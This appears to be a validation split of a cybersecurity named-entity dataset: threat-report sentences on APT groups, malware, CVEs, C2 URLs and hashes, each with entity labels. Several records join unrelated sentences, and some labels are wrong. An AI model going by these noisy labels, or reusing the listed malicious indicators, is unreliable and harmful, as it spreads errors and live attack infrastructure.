{"text": "The value used to replace GET_IMG_OBJECT comes from the JSON configuration . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted . 0x111111111 : Hide “ Loveusd ” driver from the system kernel driver list . 0x22222222 : Securely delete an in-use or no-access target file-name . 0x44444444 : Unhook the ZwWriteFile API and hook KiFastCallEntry . 0x55555555 : Remove the ZxShell Image Load Notify routine . 0x88888888 : Set a special value called “ type ” in Windows registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverMain . Ukraine ’s Computer Emergency Response Team ( CERT - UA ) has attributed the July campaign to the threat actor group UNC1151 , as a part of the GhostWriter operational activities allegedly linked to the Belarusian government .", "spans": {"Malware: ZxShell": [[520, 527]], "System: Windows": [[608, 615]], "Organization: Ukraine ’s Computer Emergency Response Team": [[689, 732]], "Organization: CERT - UA": [[735, 744]], "Organization: the Belarusian government .": [[888, 915]]}, "info": {"id": "cyberner_stix_valid_000574", "source": "cyberner_stix_valid"}}
{"text": "Despite the attention and public exposure of the toolset ’s technical details ( including IOCs ) to defenders , the Dukes still continued with their second wave of spear-phishing , including the continued use of CloudDuke .", "spans": {"Malware: CloudDuke": [[212, 221]]}, "info": {"id": "cyberner_stix_valid_000575", "source": "cyberner_stix_valid"}}
{"text": "changeActivity command The webview injects are not hosted on the C2 , they are hosted on a completely different server . From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East . KHRAT : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": {"Organization: FireEye 's Dynamic Threat Intelligence": [[163, 201]], "Malware: KHRAT": [[381, 386]], "System: MS Windows": [[442, 452]]}, "info": {"id": "cyberner_stix_valid_000576", "source": "cyberner_stix_valid"}}
{"text": "Threat groups often follow a path of least resistance to achieve their objective .", "spans": {}, "info": {"id": "cyberner_stix_valid_000577", "source": "cyberner_stix_valid"}}
{"text": "However , artifacts of the attack wave such as Command and Control ( C&C ) servers are also used as early as April 2011 and against targets outside the chemical industry .", "spans": {}, "info": {"id": "cyberner_stix_valid_000578", "source": "cyberner_stix_valid"}}
{"text": "Once executed on the machine , the code will deliver one of a number of sophisticated Remote Access Tools ( RATs ) , including AdobeARM , ATI-Agent , and MiniDionis .", "spans": {}, "info": {"id": "cyberner_stix_valid_000579", "source": "cyberner_stix_valid"}}
{"text": "Although approximately half of the attacks focus on the US , other targeted regions include China , Japan , Southeast Asia , and the United Kingdom . com to establish free subdomains in their infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000580", "source": "cyberner_stix_valid"}}
{"text": "Table 5 describes the latest variant seen in AutoFocus . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"Malware: MiniDuke": [[218, 226]], "Malware: CosmicDuke": [[229, 239]], "Malware: OnionDuke": [[242, 251]], "Malware: CozyDuke": [[254, 262]]}, "info": {"id": "cyberner_stix_valid_000581", "source": "cyberner_stix_valid"}}
{"text": "In addition to this , as reported by our peers at ESET last week , the group has also begun using a UEFI ( Unified Extensible Firmware Interface ) rootkit known as Lojax .", "spans": {"Organization: ESET": [[50, 54]], "Malware: Lojax": [[164, 169]]}, "info": {"id": "cyberner_stix_valid_000582", "source": "cyberner_stix_valid"}}
{"text": "The group extensively uses long-running strategic web compromises ( SWCs ) , and relies on whitelists to deliver payloads to select victims .", "spans": {}, "info": {"id": "cyberner_stix_valid_000583", "source": "cyberner_stix_valid"}}
{"text": "Threat Group 4127 Targets Hillary Clinton Presidential Campaign .", "spans": {}, "info": {"id": "cyberner_stix_valid_000584", "source": "cyberner_stix_valid"}}
{"text": "We initially reported on Transparent Tribe and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"Organization: FireEye Intelligence": [[78, 98]], "Indicator: MS PowerPoint document": [[153, 175]], "Vulnerability: CVE-2014-6352": [[201, 214]]}, "info": {"id": "cyberner_stix_valid_000585", "source": "cyberner_stix_valid"}}
{"text": "The Shellbot script is added to run after the victim ’s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab .", "spans": {"Malware: Shellbot": [[4, 12]]}, "info": {"id": "cyberner_stix_valid_000586", "source": "cyberner_stix_valid"}}
{"text": "The secondary payload was also written in Delphi and its developer configured it to communicate with its C2 server using HTTPS via the following URL : https://200.122.181.25/catalog/products/books.php .", "spans": {"Indicator: https://200.122.181.25/catalog/products/books.php": [[151, 200]]}, "info": {"id": "cyberner_stix_valid_000587", "source": "cyberner_stix_valid"}}
{"text": "In order to achieve this , mike.jar connects to rootdaemon through various TCP ports that the daemon binds on some extraction routines for supported applications : Port 6202 : WhatsApp extraction service . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers . However , some of the documents also play an additional role in the attack . On Oct. 10 , 2023 , Citrix released a security bulletin for a sensitive information disclosure vulnerability ( CVE-2023 - 4966 ) impacting NetScaler ADC and NetScaler Gateway appliances .", "spans": {"System: WhatsApp": [[176, 184]], "Organization: Symantec": [[221, 229]], "Organization: customers": [[332, 341]], "Vulnerability: CVE-2023 - 4966": [[532, 547]]}, "info": {"id": "cyberner_stix_valid_000588", "source": "cyberner_stix_valid"}}
{"text": "The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": {"Vulnerability: CVE-2015-1641": [[73, 86]], "Organization: Dragos": [[89, 95]]}, "info": {"id": "cyberner_stix_valid_000589", "source": "cyberner_stix_valid"}}
{"text": "Threat actors , especially those at the level of nation state , are seeking opportunities to attack these organizations , conducting elaborate , advanced operations to gain leverage , seize strategic assets , and collect information . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"Organization: Middle Eastern human rights activist": [[280, 316]]}, "info": {"id": "cyberner_stix_valid_000590", "source": "cyberner_stix_valid"}}
{"text": "Our Umbrella telemetry shows that the majority of the request comes from Australia and the majority of the phone numbers infected have the international indicative for Australia . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains . OceanLotus : plan.evillese.com:8888 11b4 . The dump files will start ' NSPPE- ' .", "spans": {"Indicator: plan.evillese.com:8888": [[338, 360]]}, "info": {"id": "cyberner_stix_valid_000591", "source": "cyberner_stix_valid"}}
{"text": "Accessing the “ Cmd ” folder in the attacker ’ s email box Moreover , it can send a specified file or all the gathered data from the victim device via email . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) . APT33 : bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet . The compromise of a system that is within the bot net is simply used to facilitate another attack .", "spans": {"Organization: financial organizations": [[247, 270]], "Malware: bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet": [[324, 405]], "Organization: system": [[428, 434]]}, "info": {"id": "cyberner_stix_valid_000592", "source": "cyberner_stix_valid"}}
{"text": "The downloaded macro component includes a function called AutoClose() as well as two payloads embedded via Base64 encoded strings .", "spans": {}, "info": {"id": "cyberner_stix_valid_000593", "source": "cyberner_stix_valid"}}
{"text": "This led to the discovery of three additional hacktools also signed using this certificate .", "spans": {}, "info": {"id": "cyberner_stix_valid_000595", "source": "cyberner_stix_valid"}}
{"text": "Exodus One checks-in by sending a POST request containing the app package name , the device IMEI and an encrypted body containing additional device information . During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East — of note , targets appeared to be located in Bahrain and Kuwait . It also shows us an actor that puts effort in opsec by only using cloud providers . This technique has been used by the group for some time , with reports of INISafeWebSSO being leveraged dating as far back as 2018 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000596", "source": "cyberner_stix_valid"}}
{"text": "Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed .", "spans": {}, "info": {"id": "cyberner_stix_valid_000597", "source": "cyberner_stix_valid"}}
{"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": {"Vulnerability: 0day exploits": [[132, 145]], "Indicator: RTF files": [[193, 202]], "Vulnerability: CVE-2017-8570": [[214, 227]]}, "info": {"id": "cyberner_stix_valid_000598", "source": "cyberner_stix_valid"}}
{"text": "The trojan will receive instructions from the C2 to spread . The research and ongoing tracking of APT10 by both PwC UK and BAE . OceanLotus : E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb Loader #1 . AdFind A publicly available tool that is used to query Active Directory .", "spans": {"Organization: PwC UK": [[112, 118]], "Organization: BAE": [[123, 126]], "Indicator: E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb": [[142, 223]]}, "info": {"id": "cyberner_stix_valid_000599", "source": "cyberner_stix_valid"}}
{"text": "Lazarus is a very active attack group involved in both cyber crime and espionage . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000600", "source": "cyberner_stix_valid"}}
{"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . In order to increase the likelihood of their malware successfully communicating home , Cyber Espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address .", "spans": {"Malware: HIGHNOON": [[22, 30]]}, "info": {"id": "cyberner_stix_valid_000601", "source": "cyberner_stix_valid"}}
{"text": "This OnionDuke variant is related to the one seen during the summer of 2013 being spread via torrent files .", "spans": {"Malware: OnionDuke": [[5, 14]]}, "info": {"id": "cyberner_stix_valid_000602", "source": "cyberner_stix_valid"}}
{"text": "Over the last year , the Sofacy group has increased its activity almost tenfold when compared to previous years , becoming one of the most prolific , agile and dynamic threat actors in the arena .", "spans": {}, "info": {"id": "cyberner_stix_valid_000603", "source": "cyberner_stix_valid"}}
{"text": "The class “ org.starsizew.Ma ” is registered to intercept incoming SMS messages , the arrival of which will trigger the Android system to call its “ onReceive ” API . FireEye also reported on these attacks in a May 22 blog post . This function accepts three parameters : the input file , the output file and the arrKey ; arrKey is calculated thanks to GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"System: Android": [[120, 127]], "Organization: FireEye": [[167, 174]], "Organization: listed on the leak site": [[569, 592]]}, "info": {"id": "cyberner_stix_valid_000604", "source": "cyberner_stix_valid"}}
{"text": "Use best practices when updating software and patches by only downloading updates from authenticated vendor sites .", "spans": {}, "info": {"id": "cyberner_stix_valid_000605", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims ; and a hash of the APK involved ( Android application ) was tagged in our sample feed for inspection . A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme . However , sometimes using public exploit code is quicker and more effective for malware authors . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"Organization: Kaspersky": [[0, 9]], "System: Android": [[130, 137]]}, "info": {"id": "cyberner_stix_valid_000606", "source": "cyberner_stix_valid"}}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users .", "spans": {"Malware: MS Word document": [[132, 148]], "Malware: Lurk": [[260, 264]]}, "info": {"id": "cyberner_stix_valid_000607", "source": "cyberner_stix_valid"}}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": {"Organization: Unit 42": [[29, 36]], "Malware: EPS files": [[109, 118]], "Vulnerability: CVE-2015-2545": [[133, 146]], "Vulnerability: CVE-2017-0261": [[151, 164]], "Organization: Tibetan Parliamentarians": [[209, 233]], "Indicator: malicious attachments": [[267, 288]], "Malware: documents bearing exploits": [[304, 330]]}, "info": {"id": "cyberner_stix_valid_000608", "source": "cyberner_stix_valid"}}
{"text": "These election attacks signaled a change of tactics on the part of APT28 , moving away from their prior low-key intelligence gathering towards more overt activity , seemingly intended to destabilize and disrupt victim organizations and countries .", "spans": {}, "info": {"id": "cyberner_stix_valid_000609", "source": "cyberner_stix_valid"}}
{"text": "Through open-source research , CTU researchers identified the owners of 66 of the targeted email addresses .", "spans": {"Organization: CTU": [[31, 34]]}, "info": {"id": "cyberner_stix_valid_000610", "source": "cyberner_stix_valid"}}
{"text": "It was recently reported that Ismail Haniyeh , the head of Hamas ’ political Bureau , had a falling-out with the Egyptian government over his visit to Tehran to participate in General Qasem Soleimani ’s funeral , following Soleimani ’s assassination .", "spans": {"Organization: Hamas": [[59, 64]]}, "info": {"id": "cyberner_stix_valid_000611", "source": "cyberner_stix_valid"}}
{"text": "It can also be downloaded by a specific command . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . SilverTerrier is a Nigerian threat group that has been seen active since 2014 .", "spans": {"Organization: media": [[249, 254]], "Organization: real estate companies": [[257, 278]], "Organization: foreign enterprises": [[281, 300]], "Organization: banks": [[305, 310]]}, "info": {"id": "cyberner_stix_valid_000612", "source": "cyberner_stix_valid"}}
{"text": "Retrieve the browsing history and bookmarks from Chrome and SBrowser ( the browser shipped with Samsung phones ) . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . JhoneRAT : https://twitter.com/jhone87438316 . They are usually motivated by a cause of some sort , such as highlighting human rights or alerting a large corporation to their system vulnerabilities .", "spans": {"System: Chrome": [[49, 55]], "System: SBrowser": [[60, 68]], "Organization: Samsung": [[96, 103]], "Organization: Symantec": [[115, 123]], "Malware: Starloader files": [[146, 162]], "Malware: AdobeUpdate.exe": [[175, 190]], "Malware: AcrobatUpdate.exe": [[193, 210]], "Malware: INTELUPDATE.EXE": [[217, 232]], "Malware: JhoneRAT": [[248, 256]], "Indicator: https://twitter.com/jhone87438316": [[259, 292]]}, "info": {"id": "cyberner_stix_valid_000613", "source": "cyberner_stix_valid"}}
{"text": "Each of these elements makes TA505 a magnifying lens through which to consider the framework employed by many modern threat actors .", "spans": {}, "info": {"id": "cyberner_stix_valid_000614", "source": "cyberner_stix_valid"}}
{"text": "Adups addressed the issue in a Nov. 16 news release , writing that some products made by BLU were updated in June with a version of its FOTA that had actually been intended for other clients who had requested an ability to stop text spam . In addition , a current ANY.RUN playback of our observed Elise infection is also available . C2 : news.softfix.co.kr .", "spans": {"Organization: Adups": [[0, 5]], "Organization: BLU": [[89, 92]], "System: FOTA": [[136, 140]], "Malware: ANY.RUN": [[264, 271]], "Malware: Elise": [[297, 302]], "Indicator: news.softfix.co.kr": [[338, 356]]}, "info": {"id": "cyberner_stix_valid_000615", "source": "cyberner_stix_valid"}}
{"text": "Oddly enough they also use it to make fun of the AV community , sharing detection screenshots from VirusTotal ( thus leaking IoC ) and even engaging in discussions with malware researchers directly The following screenshot shows tweets from their advertisement campaign : That unusual behavior could be explained by the combination of the need for attention and a probable lack of experience . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity .", "spans": {"Organization: VirusTotal": [[99, 109]], "Organization: ESET": [[412, 416]], "Organization: military": [[553, 561]]}, "info": {"id": "cyberner_stix_valid_000616", "source": "cyberner_stix_valid"}}
{"text": "We have detected a total of 17 C & C servers on 4 different domains , which probably means the bad guys are quite familiar with what redundancy is . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan .", "spans": {"Vulnerability: zero day exploit": [[201, 217]], "Vulnerability: CVE-2016-0147": [[220, 233]], "Malware: Helminth": [[291, 299]], "Malware: dropper Trojan": [[320, 334]], "Malware: HerHer Trojan": [[363, 376]]}, "info": {"id": "cyberner_stix_valid_000617", "source": "cyberner_stix_valid"}}
{"text": "Bouncing Golf ’ s operators also try to cover their tracks . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . In order to trick blue teams and other DFIR analysts , the operators created fake HTTP 302 redirection to various Google services on their C2s servers . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": {"Malware: Bouncing Golf": [[0, 13]], "Vulnerability: zero-day vulnerability": [[89, 111]], "Organization: Google": [[382, 388]]}, "info": {"id": "cyberner_stix_valid_000618", "source": "cyberner_stix_valid"}}
{"text": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , the adversaries identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": {"Malware: OwaAuth": [[7, 14]], "Malware: ChinaChopper": [[176, 188]]}, "info": {"id": "cyberner_stix_valid_000619", "source": "cyberner_stix_valid"}}
{"text": "However , it also targets applications from Romania , Ireland , India , Austria , Switzerland , Australia , Poland and the USA . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on .", "spans": {"Malware: RTF": [[134, 137]], "Vulnerability: CVE-2017_1882": [[157, 170]], "Malware: eqnedt32.exe": [[174, 186]], "Malware: IRC bot": [[212, 219]], "Malware: MPK": [[227, 230]], "Malware: Leash sample": [[274, 286]]}, "info": {"id": "cyberner_stix_valid_000620", "source": "cyberner_stix_valid"}}
{"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! Group-IB detected the first incidents relating to Silence in June 2016 . Both used DocuSign decoy documents with different macros . Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"Organization: Group-IB": [[76, 84]]}, "info": {"id": "cyberner_stix_valid_000621", "source": "cyberner_stix_valid"}}
{"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": {"Vulnerability: CVE-2019-0604": [[75, 88]], "Organization: Cyber Security Center": [[141, 162]], "Organization: Canadian Center": [[171, 186]], "Malware: Leader": [[208, 214]], "Malware: Bookworm": [[218, 226]], "Malware: Trojan": [[284, 290]], "Indicator: DLLs": [[322, 326]]}, "info": {"id": "cyberner_stix_valid_000622", "source": "cyberner_stix_valid"}}
{"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"Malware: Silence.MainModule": [[0, 18]], "Malware: CMD.EXE": [[96, 103]], "Organization: government office": [[351, 368]], "Indicator: Word documents": [[423, 437]]}, "info": {"id": "cyberner_stix_valid_000623", "source": "cyberner_stix_valid"}}
{"text": "The trojan will register the SMS handler , which will forward the contents and the sender of all of the SMS messages on the phone to the C2 . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000624", "source": "cyberner_stix_valid"}}
{"text": "The actor would use the AntSword Shell Manager to interact with the AntSword webshell on the compromised server , as the Shell Manager sends the appropriate script to the webshell that will execute to carry out the desired action .", "spans": {}, "info": {"id": "cyberner_stix_valid_000625", "source": "cyberner_stix_valid"}}
{"text": "To maximize profit , variants with “ MinSDK ” or “ OTA ” SDK are present to further infect victims with other adware families . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . For example , the MSI package used in the campaign contains different files , as shown in the table below . The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": {"Vulnerability: InPage exploits": [[160, 175]], "Organization: politically": [[218, 229]], "Organization: militarily": [[233, 243]]}, "info": {"id": "cyberner_stix_valid_000626", "source": "cyberner_stix_valid"}}
{"text": "Dumpert is a relatively new tool with its initial commit to GitHub occurring on June 17 , 2019 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000627", "source": "cyberner_stix_valid"}}
{"text": "Extract logs from WhatsApp . In September 2015 , our anti-targeted attack technologies caught a previously unknown attack . Similar to previous attacks , this campaign starts with social engineering . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": {"System: WhatsApp": [[18, 26]], "Organization: CISA": [[241, 245]]}, "info": {"id": "cyberner_stix_valid_000628", "source": "cyberner_stix_valid"}}
{"text": "Last but not least , all the overlay screens ( injects ) for the banks include two steps ; first stealing the victim ’ s login credentials , then their credit card details . HIVE is a multi-platform CIA malware suite and its associated control software . There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {}, "info": {"id": "cyberner_stix_valid_000629", "source": "cyberner_stix_valid"}}
{"text": "Also unusual was the observation that both Dridex and BitPaymer were spread through the victim network using lateral movement techniques traditionally associated with nation-state actors and penetration testing . The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {}, "info": {"id": "cyberner_stix_valid_000630", "source": "cyberner_stix_valid"}}
{"text": "Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": {"Organization: CNIIHM": [[144, 150]]}, "info": {"id": "cyberner_stix_valid_000631", "source": "cyberner_stix_valid"}}
{"text": "Based on our telemetry , Kaspersky can reassemble ScarCruft’s binary infection procedure . RedDrip Team (formerly SkyEye Team ) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . COCCOC is a Vietnam was founded in 2013 . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . these threat actors targeted a number of government agencies threat actors targeted a number of government agencies in East Asia . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 . specifically CVE-2018-0798 , before downloading subsequent payloads . The dropped PE file has the distinctive file name 8.t” . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . These conflicts have even resulted in Haftar leading an attack on the capital city in April . The attackers have targeted a large number of organizations globally since early 2017 . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . The attackers have taken great care to stay under the radar , imitating another attack group in the region . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . The malware starts communicating with the C&C server by sending basic information about the infected machine . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar . It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . In the course of this email correspondence , the attacker — Safeena” — then sent what appeared to be invitations to access several documents on Google Drive . The attackers were meticulous in making their phishing page as credible as possible . Among the targets of this campaign is the International Trade Union Confederation .", "spans": {"Organization: Kaspersky": [[25, 34]], "Organization: RedDrip Team": [[91, 103]], "Organization: SkyEye Team": [[114, 125]], "Organization: RedDrip": [[294, 301]], "Organization: media": [[676, 681]], "Organization: real estate companies": [[684, 705]], "Organization: foreign enterprises": [[708, 727]], "Organization: banks": [[732, 737]], "Organization: government": [[913, 923]], "Organization: agencies": [[924, 932]], "Organization: Microsoft": [[968, 977]], "Vulnerability: exploit": [[994, 1001]], "Vulnerability: CVE-2018-0798": [[1002, 1015], [1176, 1189]], "Malware: PE": [[1245, 1247]], "Indicator: 8.t”": [[1283, 1287]], "Organization: Symantec": [[1391, 1399]], "Organization: political": [[1691, 1700]], "Organization: parliaments": [[1784, 1795]], "Organization: senates": [[1798, 1805]], "Organization: top state offices": [[1808, 1825]], "Organization: officials": [[1830, 1839]], "Organization: political science scholars": [[1842, 1868]], "Organization: military": [[1871, 1879]], "Organization: intelligence agencies": [[1884, 1905]], "Organization: ministries": [[1908, 1918]], "Organization: media outlets": [[1921, 1934]], "Organization: research centers": [[1937, 1953]], "Organization: election commissions": [[1956, 1976]], "Organization: Olympic organizations": [[1979, 2000]], "Organization: trading companies": [[2009, 2026]], "Organization: unknown entities": [[2039, 2055]], "Organization: Cisco Talos": [[2058, 2069]], "Indicator: malware": [[2613, 2620], [2749, 2756], [2860, 2867]], "Malware: CMD/PowerShell": [[2896, 2910]], "Organization: Trade Union Confederation": [[4352, 4377]]}, "info": {"id": "cyberner_stix_valid_000632", "source": "cyberner_stix_valid"}}
{"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 exposé on Hidden Lynx .", "spans": {"Organization: defense sector firms": [[31, 51]], "Organization: Chinese dissident groups": [[54, 78]], "Organization: political , financial , pharmaceutical and energy sectors": [[83, 140]]}, "info": {"id": "cyberner_stix_valid_000633", "source": "cyberner_stix_valid"}}
{"text": "2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392 .", "spans": {"Indicator: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f": [[0, 64]], "Indicator: af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392": [[65, 129]]}, "info": {"id": "cyberner_stix_valid_000634", "source": "cyberner_stix_valid"}}
{"text": "The rootdaemon binary in fact offers several other possibilities to execute commands on the infected device just by connecting to TCP port 6200 and issuing one of the following commands . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction . CV Manal 1 : Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": {"Organization: commercial organizations": [[258, 282]], "Organization: government organizations": [[309, 333]], "Indicator: CV Manal 1": [[366, 376]], "Vulnerability: zero - day": [[506, 516]]}, "info": {"id": "cyberner_stix_valid_000635", "source": "cyberner_stix_valid"}}
{"text": "First , we determined the sample we collected , d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc was attempting to communicate to its C2 at http://supservermgr.com/sys/upd/pageupd.php to retrieve a Zebrocy AutoIT downloader .", "spans": {"Indicator: d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc": [[48, 112]], "Indicator: http://supservermgr.com/sys/upd/pageupd.php": [[156, 199]], "Malware: Zebrocy": [[214, 221]]}, "info": {"id": "cyberner_stix_valid_000636", "source": "cyberner_stix_valid"}}
